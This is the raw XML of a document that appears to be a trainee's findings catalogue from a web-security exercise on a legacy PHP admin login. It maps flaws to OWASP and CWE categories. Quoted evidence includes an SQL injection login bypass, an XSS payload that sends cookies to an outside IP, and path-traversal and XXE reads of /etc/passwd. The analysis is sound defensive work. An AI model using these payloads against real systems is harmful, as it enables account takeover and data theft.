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17928005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Finding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OWASP 2021/CWE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Exact Evidence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Confidence</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr>
            <w:trPr>
              <w:cantSplit w:val="0"/>
              <w:trHeight w:val="2623.42773437500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SQL Injection in login query through string concatenation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A03:2021 – Injection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CWE-89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WHERE username = '" . $username . "' AND password_hash = MD5('" . $password . "')</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> (01-legacy-admin-login.php)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Unsalted MD5 used for password hashing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A02:2021 – Cryptographic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CWE-328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password_hash = MD5('" . $password . "') </w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve">(01-legacy-admin-login.php)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JWT accepts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alg:none</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve">, bypassing signature verification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A07:2021 – Identification &amp; Authentication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CWE-345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if (($header['alg'] ?? '') === 'none') { return $payload; } </w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve">(01-legacy-admin-login.php)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Hard-coded JWT signing secret embedded in source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A02:2021 – Cryptographic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CWE-321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$secret = 'sankofa-legacy-admin-2019';</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve">(01-legacy-admin-login.php)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JWTs issued without expiration or not-before claims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A07:2021 – Identification &amp; Authentication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CWE-613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JWT payload only contains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iat</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve">; no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</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> or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nbf</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> (01-legacy-admin-login.php)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before="3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85239660"/>
        <w:tag w:val="goog_rdk_2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Authorization trusts role directly from database and embeds it in JWT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A01:2021 – Broken Access Control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CWE-863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'role' =&gt; $user['role'] </w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve">(01-legacy-admin-login.php)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Cookie missing Secure attribute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A02:2021 – Cryptographic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CWE-614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setcookie(... '', false, true);</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr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false</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> = Secure disabled) (01-legacy-admin-login.php)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Cookie missing SameSite attribute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A05:2021 – Security Misconfiguration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CWE-1275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setcookie()</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> only specifies HttpOnly; no SameSite parameter (01-legacy-admin-login.php)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 Redirect through unvalidated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next</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> parameter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A01:2021 – Broken Access Control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CWE-601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$next = $_GET['next'] ?? '/legacy-admin/dashboard.php'; header("Location: " . $next); </w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve">(01-legacy-admin-login.php)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SQL Injection confirmed exploited during attack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A03:2021 – Injection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CWE-89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000000"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve">HTTP capture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02:15:31</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr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username=admin' OR '1'='1</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> → </w:t>
                </w:r>
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="-2068996156"/>
                    <w:tag w:val="goog_rdk_1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188038"/>
                        <w:rtl w:val="0"/>
                      </w:rPr>
                      <w:t xml:space="preserve">302 Found → /legacy-admin/dashboard. Php </w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                    <w:color w:val="000000"/>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve">02-attacker-http-capture.txt, [02:15:31]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Cross-Site Scripting (XSS) payload submitted to comments endpoint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A03:2021 – Injection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CWE-79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Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
                    <w:color w:val="188038"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve">HTTP capture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02:18:47</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr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&lt;script&gt;fetch('</w:t>
                </w:r>
                <w:hyperlink r:id="rId7">
                  <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                    <w:rPr>
                      <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
                      <w:color w:val="1155cc"/>
                      <w:u w:val="single"/>
                      <w:rtl w:val="0"/>
                    </w:rPr>
                    <w:t xml:space="preserve">https://185.220.101.9:8443/c?'+document.cookie</w:t>
                  </w:r>
                </w:hyperlink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)&lt;/script&gt;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000000"/>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve">02-attacker-http-capture.txt, [02:18:47]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 Redirect successfully exploited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A01:2021 – Broken Access Control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CWE-601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HTTP capture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02:21:13</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> redirects to attacker-controlled domain; 02-attacker-http-capture.txt, [02:21:13]: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Path Traversal / Arbitrary File Read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A01:2021 – Broken Access Control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HTTP capture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02:24:02</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr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/files/?path=/etc/passwd</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> returned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/etc/passwd</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> contents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02-attacker-http-capture.txt, [02:24:02]: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XML External Entity (XXE) injection in XML import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A05:2021 – Security Misconfiguration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CWE-611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&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;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04-import-xxe.xml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spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:lock w:val="contentLocked"/>
        <w:id w:val="136745636"/>
        <w:tag w:val="goog_rdk_3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JWT Token 2 uses unsecured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alg:none</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> algorithm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A07:2021 – Identification &amp; Authentication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CWE-345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Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
                    <w:color w:val="188038"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve">Token 2 header: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"alg":"none"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03-legacy-admin-tokens.txt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JWT Token 3 has no lifecycle controls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A07:2021 – Identification &amp; Authentication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CWE-613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3 payload contains user and role but no expiration claim </w:t>
                  <w:br w:type="textWrapping"/>
                  <w:t xml:space="preserve">03-legacy-admin-tokens.txt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JWT Token 1 protected by weak, guessable shared secret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A02:2021 – Cryptographic Failures ·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CWE-321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1 uses HS256, matching the application's hard-coded signing secret 03-legacy-admin-tokens.txt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spacing w:after="36" w:before="3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6" w:before="3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Decoy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:spacing w:after="36" w:before="3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it?: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“hash_equals()” signature verification check.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36" w:before="3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it?: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“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jwt_verify()”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in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01-legacy-admin-login.php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(approximately lines 45–58);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:spacing w:after="36" w:before="3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6" w:before="3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Verdict:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:spacing w:after="36" w:before="3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 Exploitable; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This first looked promising as my first guess was that custom “jwt_verify()” implementation in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01-legacy-admin-login.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (as this implementation does its own signing rather than relying on a known well-tested library) was likely going to be insecure. After taking a closer look, I confirmed that the “hash_equals()” comparison implementation is correctly written. When the header includes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“alg”:”HS256”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the program hashes the received message with the shared secret and compares this hash to the received signature using “hash_equals()”, which guarantees constant time and defends against timing attacks. This mechanism isn’t what’s breaking the security. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:spacing w:after="36" w:before="3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real vulnerability appears earlier in the function:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:spacing w:after="36" w:before="36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6" w:before="36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if (($header['alg'] ?? '') === 'none') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:spacing w:after="36" w:before="36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return $payload;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:spacing w:after="36" w:before="3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6" w:before="36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6" w:before="3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logic branch returns early and completely bypasses any signature validation. Examining the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03-legacy-admin-tokens.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, we notice a JWT sample with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"alg":"none"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is an example where the app accepts an unsigned JWT without issue. This looks to be an Authentication Bypass (CWE-345 &amp; CVE-2015-9235), and has absolutely nothing to do with “hash_equals()” not working as it should. With this in mind, the threatening looking “hash_equals()” is a decoy and is never reached when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alg:none</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used. The fundamental authentication flaw is blindly trusting the attacker supplied algorithm.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after="36" w:before="3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spacing w:after="36" w:before="36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Title"/>
      <w:rPr>
        <w:sz w:val="52"/>
        <w:szCs w:val="52"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6hopvevdprn9" w:id="0"/>
    <w:bookmarkEnd w:id="0"/>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:sz w:val="52"/>
        <w:szCs w:val="52"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">D1 - Findings Catalogue</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
    <w:pPr>
      <w:pStyle w:val="Subtitle"/>
      <w:jc w:val="left"/>
      <w:rPr/>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.q2trt1k35a3r" w:id="1"/>
    <w:bookmarkEnd w:id="1"/>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Stage 2 – Web Application Security</w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">Analyst: SpicyMeatball41</w:t>
      <w:br w:type="textWrapping"/>
      <w:t xml:space="preserve">Intern ID: UBI-2026-0257</w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">Date: 18-06-2026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11827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1e40a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0f172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color w:val="1e40af"/>
      <w:sz w:val="46"/>
      <w:szCs w:val="4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color w:val="1e40af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185.220.101.9:8443/c?'+document.cooki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9q+bi8lYBX9aogpRaZKG4Ez0SQ==">CgMxLjAaHwoBMBIaChgICVIUChJ0YWJsZS5kaTltaGtieGlmankaIwoBMRIeChwIB0IYCgtSb2JvdG8gTW9ubxIJTm92YSBNb25vGh8KATISGgoYCAlSFAoSdGFibGUucHdzcmk5bGZ1c3NrGh8KATMSGgoYCAlSFAoSdGFibGUucmE5b3lxb3N1Z3FjMg5oLjZob3B2ZXZkcHJuOTIOaC5xMnRydDFrMzVhM3I4AHIhMUpCeXNINndWbDROUjVkNXdfYTA5XzV1SkFoMWd4Wm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